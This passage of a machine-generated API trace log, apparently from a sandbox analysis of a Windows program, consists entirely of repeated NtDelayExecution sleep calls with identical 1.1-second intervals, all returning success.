(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0126.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.223] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.480] NtDelayExecution 